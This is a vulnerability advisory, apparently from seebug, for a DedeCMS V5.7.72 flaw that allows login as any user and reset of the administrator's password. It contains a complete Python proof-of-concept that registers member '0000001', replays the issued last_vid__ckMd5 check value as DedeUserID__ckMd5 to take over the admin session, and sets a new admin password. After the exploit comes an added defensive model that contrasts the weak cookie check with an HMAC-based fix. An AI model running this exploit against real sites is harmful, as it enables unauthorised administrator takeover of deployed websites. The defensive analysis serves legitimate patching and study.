
DeDecms arbitrary user login, administrator password reset vulnerability

18 Jan 2018 00:00:00, reported by RootType
Source: seebug (www.seebug.org)

Dedecms arbitrary user login, administrator password reset vulnerability. Affects DeDecms V5.7.72. The front-end member module has a flaw that allows login as an arbitrary user. The payload injection point is at line 161 of memberlogin.class.php. As the PoC below shows, the attacker registers a member with the user id 0000001, visits member/index.php?uid=0000001 so that the site issues a last_vid__ckMd5 check cookie for that string, and then presents the same check value as DedeUserID__ckMd5 together with DedeUserID=0000001. The check value validates because it was computed over the identical string, the site resolves the uid to member 1 (the administrator), and the attacker can then change the administrator's password through member/edit_baseinfo.php.

Code

# coding=utf-8
# PoC from the advisory, cleaned up for Python 3: register a front-end member,
# reuse the last_vid__ckMd5 check value as DedeUserID__ckMd5 so the site treats
# the session as the administrator, then change the administrator's password
# through member/edit_baseinfo.php.
import sys

import requests


def body(rs):
    """Decode a response with the charset the site really uses (DedeCMS ships UTF-8 and GBK builds)."""
    rs.encoding = rs.apparent_encoding
    return rs.text


def save_captcha(s, base, referer, filename):
    """Fetch the CAPTCHA image and write it to disk for the operator to read."""
    rs = s.get(base + "/include/vdimgck.php", headers={"Referer": referer})
    with open(filename, "wb") as f:
        f.write(rs.content)


if __name__ == "__main__":
    base = "http://127.0.0.1".rstrip("/")
    oldpwd = "123456"    # value submitted as the current password in the profile form
    newpwd = "cnvdcnvd"  # password the administrator account ends up with
    s = requests.Session()

    # The attack needs the front-end member module to be enabled.
    if "系统关闭了会员功能" in body(requests.get(base + "/member/reg_new.php")):
        sys.exit("The system has closed the member function. Cannot attack!")
    print("The member function is enabled, good luck!")

    save_captcha(s, base, base + "/member/reg_new.php", "1.jpg")
    vdcode = input("Please enter the registration verification code: ")

    # userid "0000001" is the whole trick: the cookie check value is computed over the
    # string "0000001", but the uid is later read back as the integer 1 (the administrator).
    userid = "0000001"
    uname = "0000001"
    userpwd = "123456"

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0)",
               "Content-Type": "application/x-www-form-urlencoded"}
    data = ("dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA"
            "&userid={userid}&uname={uname}&userpwd={userpwd}&userpwdok={userpwd}"
            "&email=0000001%400000001.com&safequestion=0&safeanswer=&sex=%E7%94%B7"
            "&vdcode={vdcode}&agree=").format(userid=userid, uname=uname, userpwd=userpwd, vdcode=vdcode)
    rs = s.post(base + "/member/reg_new.php", data=data, headers=headers)
    page = body(rs)
    if "验证码错误" in page:
        sys.exit("Verification code error, account registration failed")
    elif "注册成功" in page:
        print("Registration successful!")

    # Visiting our own profile makes the site issue last_vid=0000001 together with
    # last_vid__ckMd5, the MD5 check value for that string.
    rs = s.get(base + "/member/index.php?uid={userid}".format(userid=userid))
    if "资料尚未通过审核" in body(rs):
        # member activation mode (-10 e-mail verification, -1 manual review, 0 no restriction)
        sys.exit("User information has not been approved!")
    last_vid__ckMd5 = s.cookies.get("last_vid__ckMd5")
    if not last_vid__ckMd5:
        sys.exit("No last_vid__ckMd5 cookie was issued, cannot continue")

    # Present the same check value for DedeUserID: it validates because both cookies
    # hold the string "0000001", and the site then resolves the uid to member 1.
    s.cookies["DedeUserID"] = userid
    s.cookies["DedeUserID__ckMd5"] = last_vid__ckMd5
    rs = s.get(base + "/member/index.php")
    if 'class="userName">admin</a>' in rs.text:
        print("Administrator login successful!")

    save_captcha(s, base, base + "/member/edit_baseinfo.php", "2.jpg")
    vdcode = input("Please enter the verification code: ")

    data = {"dopost": "save", "uname": "admin", "oldpwd": oldpwd, "userpwd": newpwd, "userpwdok": newpwd,
            "safequestion": "0", "newsafequestion": "0", "sex": "男", "email": "[email protected]", "vdcode": vdcode}
    rs = s.post(base + "/member/edit_baseinfo.php", data=data)
    if "成功更新你的基本资料" in body(rs):
        print("Administrator password modified successfully!")
        print("The new administrator password is: " + newpwd)
    else:
        print("attack fail")
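Added example, not code from the advisory or from DedeCMS: a small Python model of the cookie-check weakness the PoC relies on, placed next to a hardened counterpart. The secret, the exact validation logic, the __ck cookie suffix and the sample uid are constructed assumptions for illustration. The weak functions reproduce the shape the PoC exploits (a short MD5 check value computed over the cookie value alone, then a uid string converted to an integer); the strong ones bind a MAC to the cookie name as well as its value and reject non-canonical uid strings, so the last_vid check value can no longer be replayed as DedeUserID and "0000001" no longer turns into member 1.

```python
import hashlib
import hmac

# Constructed sample secret: stands in for a site's own cookie salt
# ($cfg_cookie_encode in DedeCMS); not a real value.
COOKIE_ENCODE = "s3cr3t-site-salt"


def weak_check_value(value: str) -> str:
    """Check value bound only to the cookie's value, never its name.

    Models the pattern the PoC abuses: the same 16-hex-char digest is
    valid for any cookie that happens to carry the same string."""
    return hashlib.md5((COOKIE_ENCODE + value).encode()).hexdigest()[:16]


def weak_get_cookie(cookies: dict, key: str) -> str:
    """Return cookies[key] if its <key>__ckMd5 companion validates, else ''."""
    value = cookies.get(key, "")
    ck = cookies.get(key + "__ckMd5", "")
    if not value or not ck:
        return ""
    return value if ck == weak_check_value(value) else ""


def weak_current_uid(cookies: dict) -> int:
    """Resolve DedeUserID the loose way: int('0000001') == 1, the admin's member id."""
    uid = weak_get_cookie(cookies, "DedeUserID")
    return int(uid) if uid.isdecimal() else 0


# --- hardened counterpart (assumed design, not DedeCMS code) -------------

def strong_check_value(name: str, value: str) -> str:
    """HMAC over name AND value: a tag issued for last_vid is useless for DedeUserID."""
    msg = f"{name}={value}".encode()
    return hmac.new(COOKIE_ENCODE.encode(), msg, hashlib.sha256).hexdigest()


def is_canonical_uid(s: str) -> bool:
    """Only '1' may mean member 1; '0000001', '+1', ' 1' and '' are rejected."""
    return s.isdecimal() and str(int(s)) == s


def strong_get_cookie(cookies: dict, key: str) -> str:
    """Return cookies[key] if its <key>__ck HMAC validates, else ''."""
    value = cookies.get(key, "")
    ck = cookies.get(key + "__ck", "")
    if not value or not ck:
        return ""
    expected = strong_check_value(key, value)
    return value if hmac.compare_digest(ck.encode(), expected.encode()) else ""


def strong_current_uid(cookies: dict) -> int:
    uid = strong_get_cookie(cookies, "DedeUserID")
    return int(uid) if is_canonical_uid(uid) else 0


def forge_from_last_vid(issued: dict, suffix: str) -> dict:
    """The attacker's move from the PoC: copy the check value the server issued
    for last_vid onto DedeUserID, leaving the value itself unchanged."""
    return {"DedeUserID": issued["last_vid"],
            "DedeUserID" + suffix: issued["last_vid" + suffix]}


def demo(attacker_uid: str = "0000001") -> tuple:
    """Replay the last_vid check value against both schemes; returns (weak_uid, strong_uid)."""
    # What the server hands out after member/index.php?uid=0000001 (constructed).
    weak_issued = {"last_vid": attacker_uid,
                   "last_vid__ckMd5": weak_check_value(attacker_uid)}
    strong_issued = {"last_vid": attacker_uid,
                     "last_vid__ck": strong_check_value("last_vid", attacker_uid)}
    weak_uid = weak_current_uid(forge_from_last_vid(weak_issued, "__ckMd5"))
    strong_uid = strong_current_uid(forge_from_last_vid(strong_issued, "__ck"))
    return weak_uid, strong_uid


if __name__ == "__main__":
    w, st = demo()
    print(f"weak scheme resolves the replayed cookie to member {w}")
    print(f"hardened scheme resolves it to member {st} (0 = not logged in)")
```

Running demo() shows the two halves of the bug separately: the name-bound HMAC alone already stops the cookie transfer, and the canonical-uid check is defence in depth for any other path that lets a client-supplied string reach an integer member id.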
                              
